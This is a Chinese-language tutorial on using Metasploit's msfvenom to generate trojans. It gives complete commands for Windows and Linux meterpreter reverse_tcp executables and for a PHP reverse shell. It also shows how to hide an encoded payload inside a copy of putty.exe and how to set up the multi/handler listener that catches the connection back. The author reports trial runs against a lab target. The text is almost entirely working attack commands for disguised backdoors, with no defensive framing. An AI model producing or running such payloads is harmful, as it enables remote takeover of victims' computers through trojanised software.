msfvenom的使用

msfvenom也只metasploit中的一个很强的工具，msfvenom生成木马非常的迅速可以各种版本的木马

该工具由msfpaylod和msfencodes的组成

生成木马是需要在本地监听，等待木马上线即可。该步骤在meterpretr的使用有使用到

命令

这里我们主要讲解msfvenom的命令

命令	参数
-l	列出指定模块中payload的数量,payload.nops.all......
-p	指定使用的payload
-f	指定输出文件的格式，例如 exe、elf
-e	指定编码类型
-i	编码次数
-a	指定目标结构，例如x86、x64
-o	导出木马的位置
-b	木马中不能出现的字符
-x	将payload加入到的文件
-k	将payload加入到原文件的复制中

查找模块

msfvenom -l platforms查看支持的平台



参数很长，可能记不清楚，那么我们只需要输入一个错误的模块，msfvenom会提示我们可以查看那些



可以看到我们可以查询的模块

例如我们想要查找一个windows带有meterpreter控制台的，我们可以执行

msfvenom -l payloads|grep windows|grep meterpreter



这里已经找到了相关的模块

msfvenom -l encoders，查看可用的编码模块

生成一个windows木马

msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.16.1.1 LPORT=1234 -f exe -o /root/shell.exe

生成一个linux木马

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=172.16.1.1 LPORT=1234 -f elf -o /root/shell.elf

将我们的木马加入到exe文件

这里由常用的远程连接工具putty为例

msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.16.1.1 LPORT=1234 -x putty.exe -k -a x86 -e x86/shikata_ga_nai -i 2 -f exe -o super_putty.exe

注意：-a指定结构，x指定文件，-e指定编码方式，-i指定编码次数



这里编码并没有成功导出文件，报错了，提示我们溢出，正常情况下是可以成功的

后续我换了一个putty的版本成功了

msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.16.1.102 LPORT=1234 -x putty.exe -k -e ruby/base64 -i 1 -f exe -o S_putty.exe

于上次不同这次使用的是ruby/base64加密





将木马共享到windows电脑上指定putty，

在本机设置监听，在windows电脑上执行我们的木马，查看是否可以反弹shell

use exploit/multi\handler
set payload windows/meterpreter/reverse_tcp
set LHOST 172.16.1.102
set LPORT 1234
run

这里我并没有反弹成功，在靶机执行程序崩溃了，出了些问题，但是我们的命令没有出问题，可以再换一个程序试一试



之前测试是可以成功的

php反弹

查找phppayload





msfvenom -p php/meterpreter/reverse_tcp LHOST=172.16.1.102 LPORT=1234 -f raw > shell.php

这里反弹shell我是成功了，但是使用shell连接执行命令的时候总是断开，可能不支持吧，这里还是建议手写的一句话木马



在linux中我尝试的时候，无法反弹shell